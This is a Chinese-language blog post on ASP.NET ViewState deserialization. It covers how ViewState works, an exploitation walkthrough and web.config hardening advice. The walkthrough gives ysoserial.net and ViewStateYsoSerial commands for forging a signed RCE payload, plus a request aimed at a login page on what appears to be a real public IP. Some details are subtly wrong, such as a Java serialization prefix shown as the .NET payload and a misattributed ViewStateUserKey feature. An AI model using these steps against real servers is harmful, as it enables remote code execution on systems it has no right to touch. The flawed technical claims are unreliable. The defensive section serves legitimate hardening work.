深入解析 ASP.NET 的 ViewState 反序列化漏洞

于 2024-08-28 09:00:00 发布
阅读量722 收藏 17
点赞数 8
分类专栏: Penetration test 文章标签: asp.net 后端 渗透测试 WEB 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33163046/article/details/141549823
版权

1.  ViewState 基本知识

1.1 什么是 ViewState

ViewState 是 ASP.NET(Active Server Pages .NET)框架用来保持页面状态的一种机制。ASP.NET 是微软开发的用于动态网页服务器端开发的框架,ViewState 是其中用于维护和管理页面状态的一部分。它在客户端和服务器之间存储页面和控件的状态。

1.2 ViewState 的工作原理

  1. 保存页面状态: 每次页面请求和响应,服务器端控件的状态信息需要保存在客户端,待下一次请求时恢复。ViewState 就是在页面生成过程中将控件状态编码并嵌入到页面的隐藏字段中。

  2. 在客户端存储和传输: ViewState 的数据以 Base64 编码格式存储在页面中的一个名为 __VIEWSTATE 的隐藏字段里,随每次表单提交一起传输到服务器。

  3. 恢复页面状态: 页面在提交到服务器后,ASP.NET 会将 __VIEWSTATE 字段的数据提取出来进行解码并恢复控件的状态

1.3 实现细节

在典型的 ASP.NET 页面上,ViewState 数据通常类似如下:

<form id="form1" runat="server">
  <div>
    <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="dDwtNzI4MjcyOTUzO3Q8O2w8aTwxPjs+" />
    <!-- 其他表单控件 -->
  </div>
</form>

解释:

  • __VIEWSTATE 的 value 属性存储了编码后的数据,这些数据包含了控件的状态信息。

1.4 ViewState的优势和缺点

优势:

  1. 简单实现状态保持:不需要开发者额外的编码,ASP.NET 内部就能自动管理控件的状态。
  2. 减少服务器负载:状态数据存储在客户端,减少服务器存储的压力。

缺点:

  1. 带宽占用:ViewState 数据直接嵌入到 HTML 中,会增加页面大小,从而影响性能。
  2. 安全问题:如果不加密和未正确校验的话,ViewState 数据可能被篡改,进而带来安全隐患。

2. 漏洞形成原因和漏洞利用原理

2.1 漏洞形成原因

  1. ViewState 未加密:如果 ViewState 未加密,攻击者可以通过篡改 ViewState 内容植入恶意代码。
  2. ViewState 未签名或签名不严密:未经签名或者签名不严密的 ViewState 可能被攻击者修改,并在服务器上反序列化执行,从而导致代码执行漏洞。

2.2 漏洞利用原理

利用 ViewState 反序列化漏洞,攻击者可以通过伪造序列化对象,使得 ViewState 执行其嵌入的恶意代码,从而在服务器端执行任意代码(RCE - Remote Code Execution)。

3. 漏洞验证

3.1 提取ViewState数据

通过网页源码提取到 ViewState 数据:

<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="POVu3JjlPFxLXHTPREYtUzNM**************************************************************************************ptQ==" />

上面的内容从value属性中提取得到的值是我们需要的重要数据:

POVu3JjlPFxLXHT***********************************************************************************/ptQ==

3.2 使用EnumerationKey解码ViewState数据

接下来,使用EnumerationKey工具来解码ViewState数据,并找到密钥信息。请按照工具的要求提供相关输入:

  1. Modifier: 一般会从页面源代码或服务端配置中进行设置。
  2. Key Path: 指定密钥文件路径,通常包含服务器/应用程序密钥。
  3. ViewState Data: 提取到的长字符串作为ViewState数据输入。

3.3 解码并分析ViewState数据

根据成功率,在完成解密验证后,您会得到相关信息,例如:

  • IsEncrypted: True
  • Validation: SHA1
  • ValidationKey: <Value>
  • Decryption: TripleDES
  • DecryptionKey: <Value>

3.4 生成恶意ViewState数据

  1. 使用ysoserial.net生成payload: 假设要生成一个执行cmd /c whoami命令的ViewState payload:

    ysoserial.exe -g ActivitySurrogateSelector -p "cmd /c whoami" -o base64

  2. 结合解元信息

    将生成的payload结合刚刚提取的关键信息进行加密和签名。使用例如ViewStateYsoSerial工具进行操作:

    ViewStateYsoSerial.exe -validationKey 319B474B1******************************* -decryptionKey 280450B********************************* -validation SHA1 -decryption TripleDES -payload rO0ABXNyAC...

    最终得到的新ViewState内容。

3.5 发送payload请求

  1. 使用Burp Suite或Postman: 拦截并编辑请求,替换原始的ViewState值为容恶意的ViewState数据。

    POST /FLoginNew.aspx HTTP/1.1
Host: 106.14.218.28
Content-Type: application/x-www-form-urlencoded
Content-Length: 1000

__VIEWSTATE=生成的新恶意ViewState内容&其他参数...

  2. 验证执行结果: 观察执行结果,如命令whoami返回服务器用户名,则证明漏洞利用成功。

4. 漏洞修复

为了防止ViewState反序列化漏洞,可以进行以下修复措施:

1. 启用ViewState MAC验证(消息认证码)

启用并确保 ViewState 消息认证码验证 (MAC),以防止未授权的篡改:

web.config 文件中,确保设置了正确的 machineKey

<system.web>
  <machineKey validationKey="AutoGenerate,IsolateApps" decryptionKey="AutoGenerate,IsolateApps" validation="HMACSHA256" decryption="AES" />
</system.web>

这个配置会对 ViewState 数据进行签名操作,保证数据的完整性和真实性。如果数据在传输过程中被篡改,服务器将会识别出来并拒绝。

2. 启用ViewState加密

确保 ViewState 数据传输是加密的,可以防止敏感数据被窃取:

web.config 文件中,配置 ViewState 加密:

<system.web>
  <pages enableViewStateMac="true" viewStateEncryptionMode="Always" />
</system.web>

viewStateEncryptionMode 设置为 "Always" 确保所有 ViewState 数据都将进行加密处理。

3. 升级到最新的ASP.NET版本

将您的 ASP.NET 框架升级到最新版本,最新版本中针对 ViewState 安全性进行了多个改进:

确保您的应用程序和服务器运行在最新版本的 ASP.NET 和 .NET Framework 上。

4. 限制反序列化对象的类型

限制 ASP.NET 只允许序列化和反序列化必要的安全类型:

启用 ASP.NET 4.5 引入的 ViewStateUserKey 机制,绑定 ViewState 数据到用户会话。

6. 安全编码和验证

  1. 输入验证:

    确保所有用户输入都经过严格验证和过滤,避免恶意代码注入。

  2. 反序列化过滤:

    在反序列化数据前,确保已经对数据进行了完整性检查和验证。

5. 总结

在本文中,我们深入探讨了 ASP.NET 中的 ViewState 反序列化漏洞,包括其原理、如何验证漏洞的存在、以及如何修复漏洞。通过全面理解该漏洞的工作机制,我们可以更加有效地保护应用程序免受攻击。

关键点回顾:

  1. ViewState 反序列化漏洞原理

    • ViewState 通过 Base64 编码,将页面和控件的状态信息传递给客户端和服务器。
    • 如果 ViewState 未加密或未正确签名,攻击者可以篡改 ViewState 数据并执行恶意代码。

  2. 验证漏洞存在

    • 通过提取网页源代码中的 ViewState 数据,并使用工具来生成和验证恶意的 ViewState payload,测试服务器是否存在漏洞。

  3. 修复漏洞的方法

    • 启用 ViewState 的 MAC 验证和加密,以确保数据完整性和安全性。
    • 升级到最新版本的 ASP.NET 框架,获取最新的安全改进。
    • 限制 ViewState 的使用,仅在必要时启用,并采用安全的编码实践和严格的数据验证。

  4. 安全实践

    • 定期审计和更新安全配置,确保应用程序持续处于最佳安全状态。
    • 采用全面的安全编码和验证措施,避免潜在的安全风险。

参考资料:

GPT4.0

晓翔仔
关注
  • 8
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Mojarra JSF ViewState 反序列化漏洞复现
0xSec
01-10 1729
JavaServer Faces,新一代的Java Web应用技术标准,吸收了很多Java Servlet以及其他的Web应用框架的特性。JSF为Web应用开发定义了一个事件驱动的、基于组件的模型。其中最常用的是Sun(现在的Oracle)发布的Mojarra和Apache发布的MyFacesJavaServerFaces(JSF)概念在几年前就已经引入,现在主要在J2EE中使用。
.NET高级代码审计(第十课) ObjectStateFormatter反序列化漏洞1
08-03
.NET框架中的ObjectStateFormatter是一种专用于序列化和反序列化状态对象图的工具,常见于ASP.NET中的ViewState处理。然而,如果不谨慎处理反序列化过程,它可能成为一个安全漏洞,可能导致远程代码执行(RCE)攻击...
.NET高级代码审计(第十一课) LosFormatter反序列化漏洞
最新发布
ahhacker86的专栏
12-28 1108
为了帮助研发大佬们熟悉和掌握.NET应用安全相关的漏洞介绍和修复解决方案,我们创建了一个.NET应用安全建设的星球,专门科普.NET领域相关的安全漏洞和提供漏洞修复方法,星球部分主题如下图所示。格式序列化,此类支持序列化的任何对象图。另外如果对.NET安全攻防技术研究和渗透感兴趣的朋友们,可以扫下面的dot.Net安全矩阵星球二维码,加入我们。由于之前已经介绍了漏洞的原理,所以本篇就不再冗余的叙述,没有看的朋友请参考《由于之前已经介绍了漏洞的原理,所以本篇就不再冗余的叙述,没有看的朋友请参考《
Mojarra JSF ViewState 反序列化漏洞
黑白的博客
12-27 2323
声明 好好学习,天天向上 漏洞描述 JavaServer Faces (JSF) 是一种用于构建 Web 应用程序的标准,Mojarra是一个实现了JSF的框架。在其2.1.29-08、2.0.11-04版本之前,没有对JSF中的ViewState进行加密,进而导致攻击者可以构造恶意的序列化ViewState对象对服务器进行攻击。 影响范围 2.1.29-08前 2.0.11-04前 复现过程 这里使用2.1.28版本 使用vulhub /app/vulhub-master/mojarra/jsf-view
ASP.NETViewState反序列化利用
qq_43571759的博客
10-04 1889
ASP.NETViewState反序列化利用 做项目学到一手记录下 viewstate是什么 按键名称存储每个控件的值,如哈希表 跟踪对视图状态值的初始状态的更改 序列化和取消序列化保存的数据到客户端上的隐藏窗体字段 自动恢复回贴的 ViewState 数据 ASP.NET 支持三种不同的开发模式: Web Pages(Web 页面)、MVC(Model View Controller 模型-视图-控制器)、Web Forms(Web 窗体)基于 web forms ,目的是为服务端控件状态进行持
asp.netviewstate 反序列化攻击 学习记录
qq_41891666的博客
07-13 5981
0x00 前言 asp.net 平时接触得少,ctf 中也比较少遇到,之前对他的了解也只限于对 c# 语言的一些简单学习。然后这次在 buu 上面遇到 一道 [BJDCTF 2nd]EasyAspDotNet 题,然后在看wp 的时候,又碰巧了解到 HITCON CTF 2018 - Why so Serials? 和这题差不到,都是利用了viewstate 反序列化来做;然后在查资料的时候,又发现 CVE-2020-0688 exchange远程代码执行漏洞 也是利用viewstate 反序列化漏洞
反序列化漏洞漏洞复现
来日可期的博客
09-05 3862
反序列化漏洞是指应用程序在对已经序列化的数据进行反序列化时,由于缺少必要的验证或过滤,导致恶意数据被成功地反序列化为对象并被执行。攻击者可以构造恶意数据来利用这个漏洞,攻击方式通常是通过网络等传输渠道向目标应用程序发送序列化数据,使得应用程序在反序列化时执行了攻击者所构造的恶意代码,进而导致应用程序受到攻击。
.NET高级代码审计(第十课) ObjectStateFormatter反序列化漏洞
ahhacker86的专栏
12-26 1719
期待更多伙伴的加入!为了帮助研发大佬们熟悉和掌握.NET应用安全相关的漏洞介绍和修复解决方案,我们创建了一个.NET应用安全建设的星球,专门科普.NET领域相关的安全漏洞和提供漏洞修复方法,星球部分主题如下图所示。但是使用反序列化不受信任的二进制文件会导致反序列化漏洞从而实现远程RCE攻击,本文笔者从原理和代码审计的视角做了相关介绍和复现。另外如果对.NET安全攻防技术研究和渗透感兴趣的朋友们,可以扫下面的dot.Net安全矩阵星球二维码,加入我们。.NET反序列化漏洞文章,欢迎大伙持续关注,交流。
C#反序列化漏洞
m0_47968686的博客
08-20 1591
CVE-2020-0688反序列化漏洞 漏洞成因 漏洞产生的主要原因就是在Exchange ECP组件中发现,邮件服务在安装的过程中不会随机生成秘钥,也就是说所有默认安装的Exchange服务器中的validationKey和decryptionKey的值都是相同的,攻击者可以利用静态秘钥伪造__VIEWSTATE参数从而触发反序列化漏洞。 环境、工具 WinServer2016、Exchange Server2016、win10、dnspy 分析 default.aspx被解析,继承Page类(Page
asp.net viewState
u013400314的博客
08-18 577
那么,有了这个隐藏域,页面里其他所有的控件的状态,包括页面本身的一些状态都会保存到这个控件值里面. 每次页面提交时一起提交到后台,asp.net对其中的值进行解码,然后输出时再根据这个值来恢复各个控件的状态. 我们再看这个控件的value值,它可能类似如下的形式:Oz4+O2w8aTwxPjs+O2w8…当请求某个页面时,ASP.NET会把所有控件的状态序列化成一个字符串,然后作为窗体的隐藏属性送到客户端,当客户端吧页面回传时,ASP.NET分析回传的窗体属性,并赋给控件对应的值。.........
asp.net viewstate 回发机制
10-29
ASP.NET视图状态(ViewState)是.NET框架中用于在页面回发过程中保持用户界面状态的一种机制。在Web开发中,由于HTTP协议的无状态性,每次客户端与服务器之间的交互都会导致页面状态丢失,除非采取某种手段来存储和...
kali-linux自带burpsuite使用
热门推荐
qq_33163046的博客
12-14 1万+
通过本文配置,burpsuite就可以正常使用了。但是,kali自带的burpsuite是免费版的,有不少功能不可以使用,如果要发挥burpsuite的所有功能,可以购买证书或者使用破解版。
XSS原理&dvwa&xssvalidator使用
qq_33163046的博客
08-07 1万+
渗透COP之XSS原理&测试案例 1.什么是XSS 跨站脚本(Cross Site Scripting,XSS)是一种经常出现在web应用程序中的计算机安全漏洞。攻击者利用网站漏洞把恶意的代码注入到网页之中。当其他用户浏览到这些网页后,就会执行其中的恶意代码,对受害用户可能采取cookie资料截取、会话劫持、钓鱼欺骗等各种攻击。 Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,C.
从安卓系统USB升级包里提取system.img、boot.img和recovery.img在内的镜像文件
qq_33163046的博客
03-02 1万+
如果你拿到一个USB升级包,你会发现升级包的结构基本相似。但是里面并不是直接就有包括system.img、boot.img和recovery.img在内的镜像文件。如果我们需要在Android手机上获取Magisk。提取内核(boot.img)就至关重要。当然其他镜像根据你的需要也有其他用处。这时,如果你需要这些镜像文件,怎么做呢?关注 "升级包>update.zip>payload.bin"。我们这篇的博客的目的就是从payload.bin中提取出镜像文件。
基于pycharm的xsstrike跟踪调试
qq_33163046的博客
03-01 1万+
XSStrike介绍 XSStrike 是一款用于探测并利用XSS漏洞的脚本 XSStrike目前所提供的产品特性: 对参数进行模糊测试之后构建合适的payload 使用payload对参数进行穷举匹配 内置爬虫功能 检测并尝试绕过WAF 同时支持GET及POST方式 大多数payload都是由作者精心构造 误报率极低 调试准备步骤 1.下载基线代码并解压 下载地址: https://github.com/s0md3v/XSStrike 下载解压后如图: 2.pych...
RSA基本原理及常见攻击方法
qq_33163046的博客
06-15 1万+
RSA原理,RSA常见攻击方法,x509证书中提取N和e
Android逆向工具 - jadx 安装使用 和 --show-bad-code查找未成功解析代码
qq_33163046的博客
10-25 1万+
jadx是个人比较喜欢的一款反编译利器,同时支持命令行和图形界面,能以最简便的方式完成apk的反编译操作。 下载地址: https://github.com/skylot/jadx 若你已经安装JRE,则只需下载jadx-gui-1.2.0-no-jre-win.exe 即可。 双击打开工具,点击file-openfile,选择你想要分析的文件,就可以直接使用。 工具支持apk、dex、jar、aar等格式的文件,可以通用File - Open f...
一则汽车CAN总线的安全渗透题目分析
qq_33163046的博客
12-15 1万+
题目 目前大部分汽车采用基于CAN总线的诊断服务(ISO 14229-1),然而CAN报文有效数据最多只 有8个字节,因此引入CAN传输层协议(ISO 15765-2)以使CAN报文可以传输大于8字节的有效 数据。 白帽“小安”在做诊断相关测试的时候录制了一段Log,请帮助小安分析 1) 这段Log展示了哪个诊断服务过程?(须写明服务英文全称) 2) 这段Log体现了哪些风险? 3) 你可以利用上述某个风险基于最后两帧报文进行渗透吗?(须写明具体过程,如构造的报 文) 4) 这段Log中存在一个协议错误,你
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值